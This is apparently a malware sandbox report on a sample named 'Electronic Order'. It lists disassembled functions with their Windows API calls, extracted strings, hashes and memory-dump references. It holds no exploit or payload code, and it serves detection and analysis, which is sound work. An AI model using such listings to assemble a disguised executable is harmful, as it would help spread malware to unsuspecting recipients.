                                      • Opcode Fuzzy Hash: a276297ab4e03a53b3b840244ac06c9d885e8c8d8019b3c2ff91d6e3398f81a3
                                      • Instruction Fuzzy Hash: C8A181703142029BCB14EF20D951F6AB7E5FF84314F14596CB89AAB6D2DB70EC45CB61
                                      Function 00E352F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00E35309
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00E35314
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E3531F
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00E3532A
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00E35335
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00E35340
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00E3534B
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00E35356
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00E35361
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00E3536C
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00E35377
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00E35382
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00E3538D
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00E35398
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00E353A3
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00E353AE
                                      • GetCursorInfo.USER32(?), ref: 00E353BE
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00E353E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
                                      • API String ID: 3215588206-0
                                      • Opcode ID: 5b525f6c788143e3634fb6d2e89c09a06fd857ea4366a1f0246f35d2a2132420
                                      • Instruction ID: 4c6345da6a117b03785c1f10faee4922039a8677c3877c4cc1c48d46c02b3142
                                      • Opcode Fuzzy Hash: 5b525f6c788143e3634fb6d2e89c09a06fd857ea4366a1f0246f35d2a2132420
                                      • Instruction Fuzzy Hash: 09417170E04319AADB109FBA8C49D6EFFF8EF51B10F10452FE519E7290DAB8A401CE61
                                      Function 00E1AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1AAA5
                                      • __swprintf.LIBCMT ref: 00E1AB46
                                      • _wcscmp.LIBCMT ref: 00E1AB59
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E1ABAE
                                      • _wcscmp.LIBCMT ref: 00E1ABEA
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E1AC21
                                      • GetDlgCtrlID.USER32(?), ref: 00E1AC73
                                      • GetWindowRect.USER32(?,?), ref: 00E1ACA9
                                      • GetParent.USER32(?), ref: 00E1ACC7
                                      • ScreenToClient.USER32(00000000), ref: 00E1ACCE
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1AD48
                                      • _wcscmp.LIBCMT ref: 00E1AD5C
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E1AD82
                                      • _wcscmp.LIBCMT ref: 00E1AD96
                                        • Part of subcall function 00DE386C: _iswctype.LIBCMT ref: 00DE3874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: e692507d39ffe042013182c406686abfc6e48e35a5d90601652762389dae9c70
                                      • Instruction ID: 64e557f6c4ef321057994a95b123cd243ab66b80fe1ebb601b32d20e4ef73cd7
                                      • Opcode Fuzzy Hash: e692507d39ffe042013182c406686abfc6e48e35a5d90601652762389dae9c70
                                      • Instruction Fuzzy Hash: F3A1CE71205646AFD714DF20D884BFAF7E8FF44319F085629F999A2190DB30E985CBA2
                                      Function 00E1B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00E1B3DB
                                      • _wcscmp.LIBCMT ref: 00E1B3EC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E1B414
                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E1B431
                                      • _wcscmp.LIBCMT ref: 00E1B44F
                                      • _wcsstr.LIBCMT ref: 00E1B460
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1B498
                                      • _wcscmp.LIBCMT ref: 00E1B4A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E1B4CF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1B518
                                      • _wcscmp.LIBCMT ref: 00E1B528
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00E1B550
                                      • GetWindowRect.USER32(00000004,?), ref: 00E1B5B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 3b8dfe90d599e6ead9267d73f61f08802cf467a83030b6ecafa70680663293f9
                                      • Instruction ID: 5f4ddd1ca63f84355c8b0ca1d4a58d4e496e0f16c171483b33570c2db09707f0
                                      • Opcode Fuzzy Hash: 3b8dfe90d599e6ead9267d73f61f08802cf467a83030b6ecafa70680663293f9
                                      • Instruction Fuzzy Hash: C781D0710043059FDB04DF11C885FEA7BE9EF44718F04906AFD95AA0A2EB34DD89CBA1
                                      Function 00E4C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DragQueryPoint.SHELL32(?,?), ref: 00E4C917
                                        • Part of subcall function 00E4ADF1: ClientToScreen.USER32(?,?), ref: 00E4AE1A
                                        • Part of subcall function 00E4ADF1: GetWindowRect.USER32(?,?), ref: 00E4AE90
                                        • Part of subcall function 00E4ADF1: PtInRect.USER32(?,?,00E4C304), ref: 00E4AEA0
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4C980
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E4C98B
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E4C9AE
                                      • _wcscat.LIBCMT ref: 00E4C9DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E4C9F5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4CA0E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4CA25
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4CA47
                                      • DragFinish.SHELL32(?), ref: 00E4CA4E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E4CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                      • API String ID: 169749273-2073472848
                                      • Opcode ID: f02035785d5f74cda19f7c1f04c62b893f9e4ca9f22a58d1c1fc2011b99b0d8e
                                      • Instruction ID: 0f66eeac3953641a9103e51b38f665f707f6352591f387aa05868b45e52623dc
                                      • Opcode Fuzzy Hash: f02035785d5f74cda19f7c1f04c62b893f9e4ca9f22a58d1c1fc2011b99b0d8e
                                      • Instruction Fuzzy Hash: 6A617D71508301AFC701EF61DC85E9FBBE8EF89750F00092EF595A31A1DB709A49CBA2
                                      Function 00E1B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 50c44ea9ac27249a35f1c01bd92ed13959c5931a728a384b39008edbc4f41f7b
                                      • Instruction ID: ed7c16cbd4b0abe3493b21e4d7d4aebc7ebab0dc40edb02e6c8e61fd4efa0ce1
                                      • Opcode Fuzzy Hash: 50c44ea9ac27249a35f1c01bd92ed13959c5931a728a384b39008edbc4f41f7b
                                      • Instruction Fuzzy Hash: BD318B31A04306A6DB14FAA1DD43EEE77A8EF20750F605129F415B20E2EF61AE48CA71
                                      Function 00E1C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 00E1C4D4
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E1C4E6
                                      • SetWindowTextW.USER32(?,?), ref: 00E1C4FD
                                      • GetDlgItem.USER32(?,000003EA), ref: 00E1C512
                                      • SetWindowTextW.USER32(00000000,?), ref: 00E1C518
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C528
                                      • SetWindowTextW.USER32(00000000,?), ref: 00E1C52E
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E1C54F
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E1C569
                                      • GetWindowRect.USER32(?,?), ref: 00E1C572
                                      • SetWindowTextW.USER32(?,?), ref: 00E1C5DD
                                      • GetDesktopWindow.USER32 ref: 00E1C5E3
                                      • GetWindowRect.USER32(00000000), ref: 00E1C5EA
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E1C636
                                      • GetClientRect.USER32(?,?), ref: 00E1C643
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E1C668
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E1C693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7989e9880e81e6ab2ea7b5783756f32b1a06ea4866acce8e3f5b0186fd4a7d0c
                                      • Instruction ID: db027ee00bfab576aab9ce65a69f9531168f50456dffeb1184a296bfbfd0af57
                                      • Opcode Fuzzy Hash: 7989e9880e81e6ab2ea7b5783756f32b1a06ea4866acce8e3f5b0186fd4a7d0c
                                      • Instruction Fuzzy Hash: B0515E70900709AFDB209FA9DD89BAEBBF5FF04B05F104528E696F25A0C774B945CB50
                                      Function 00E4A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E4A4C8
                                      • DestroyWindow.USER32(?,?), ref: 00E4A542
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E4A5BC
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E4A5DE
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4A5F1
                                      • DestroyWindow.USER32(00000000), ref: 00E4A613
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DC0000,00000000), ref: 00E4A64A
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4A663
                                      • GetDesktopWindow.USER32 ref: 00E4A67C
                                      • GetWindowRect.USER32(00000000), ref: 00E4A683
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E4A69B
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E4A6B3
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      • Opcode ID: ded244737c86b9c68ceba50ccbfed8c6152be53921edb5095406eb35106c4088
                                      • Instruction ID: f66554a2e8d353c5513f8804b6a69db1c4e88464d5bd3c7465771c7a3dc30c84
                                      • Opcode Fuzzy Hash: ded244737c86b9c68ceba50ccbfed8c6152be53921edb5095406eb35106c4088
                                      • Instruction Fuzzy Hash: CE71DD71180205AFD724CF28DC49F6A7BE5FB88714F49456DF989A72A0C770E906CF62
                                      Function 00E44619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E446AB
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E446F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: 31dc5c5a926ad2f1f0b6f86dc9760aa4682ca426c49b0e4506cb5eecd50a18cf
                                      • Instruction ID: 215ef2e5a665df89d13d10e9b52d749905b25269d46a84dadb59971fae16b2d5
                                      • Opcode Fuzzy Hash: 31dc5c5a926ad2f1f0b6f86dc9760aa4682ca426c49b0e4506cb5eecd50a18cf
                                      • Instruction Fuzzy Hash: 5F9161742047029FCB14EF20D451BAAB7E1EF84314F05A45DF89A6B7A2DB70ED46CB61
                                      Function 00E4BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E4BB6E
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E49431), ref: 00E4BBCA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4BC03
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E4BC46
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4BC7D
                                      • FreeLibrary.KERNEL32(?), ref: 00E4BC89
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4BC99
                                      • DestroyIcon.USER32(?,?,?,?,?,00E49431), ref: 00E4BCA8
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E4BCC5
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E4BCD1
                                        • Part of subcall function 00DE313D: __wcsicmp_l.LIBCMT ref: 00DE31C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      • Opcode ID: ba804bd891910f53c182fe462c277b9073f0f9adb9f39c7bb00c7c738a005d1d
                                      • Instruction ID: 063d220434efebbe34dcdbaa61d49ded65df285dc2f44b1aafffe82af2cb2712
                                      • Opcode Fuzzy Hash: ba804bd891910f53c182fe462c277b9073f0f9adb9f39c7bb00c7c738a005d1d
                                      • Instruction Fuzzy Hash: F061E271900215BEEB14DF65DC86FBEB7A8EB08B14F10411AF815E61C0DB74DA95CBA0
                                      Function 00E2A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00E4FB78), ref: 00E2A0FC
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E2A11E
                                      • __swprintf.LIBCMT ref: 00E2A177
                                      • __swprintf.LIBCMT ref: 00E2A190
                                      • _wprintf.LIBCMT ref: 00E2A246
                                      • _wprintf.LIBCMT ref: 00E2A264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                      • API String ID: 311963372-1048875529
                                      • Opcode ID: 8b1810f64e24551be6a12b3f72dc1dc427d924a3b66a58bac5eb7e8f1e169f5b
                                      • Instruction ID: a5da5b5d6b742891dde77fc38c8dee0d0235a400898800d600632539011a0dbf
                                      • Opcode Fuzzy Hash: 8b1810f64e24551be6a12b3f72dc1dc427d924a3b66a58bac5eb7e8f1e169f5b
                                      • Instruction Fuzzy Hash: B151297290021AABCB15EBE0DD86EEEB779EF04300F1451A9B505730A1EB316E99DF71
                                      Function 00E2A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CharLowerBuffW.USER32(?,?), ref: 00E2A636
                                      • GetDriveTypeW.KERNEL32 ref: 00E2A683
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A6CB
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A702
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A730
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      • Opcode ID: 4746307810f7cd247a129a2481cccac073bfc20e2d28ae6a3d8b8035556a89b0
                                      • Instruction ID: 4d3a52de0b3e1cabe6c1acbdc3f2c64dc0d110ff9cccd62bcbec5a05ae2f5e4c
                                      • Opcode Fuzzy Hash: 4746307810f7cd247a129a2481cccac073bfc20e2d28ae6a3d8b8035556a89b0
                                      • Instruction Fuzzy Hash: B0514D711043059FC700EF21D891D6AB7F4EF94718F18996DF89AA7251DB31AE0ACB62
                                      Function 00E2A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2A47A
                                      • __swprintf.LIBCMT ref: 00E2A49C
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2A4D9
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E2A4FE
                                      • _memset.LIBCMT ref: 00E2A51D
                                      • _wcsncpy.LIBCMT ref: 00E2A559
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E2A58E
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A599
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00E2A5A2
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A5AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: edca7f150eccdf8d5bc6c9ad3b3673ba39afab44f1337076bbe90b21f217d5f0
                                      • Instruction ID: 096c49d698ff0baa67f9a8d3f8c275f5867f24ef09683d9a30f221202ec42273
                                      • Opcode Fuzzy Hash: edca7f150eccdf8d5bc6c9ad3b3673ba39afab44f1337076bbe90b21f217d5f0
                                      • Instruction Fuzzy Hash: BA31B0B5500219ABDB219FA1EC49FEB73BCEF89705F1441B6FA08E2160E77097458B35
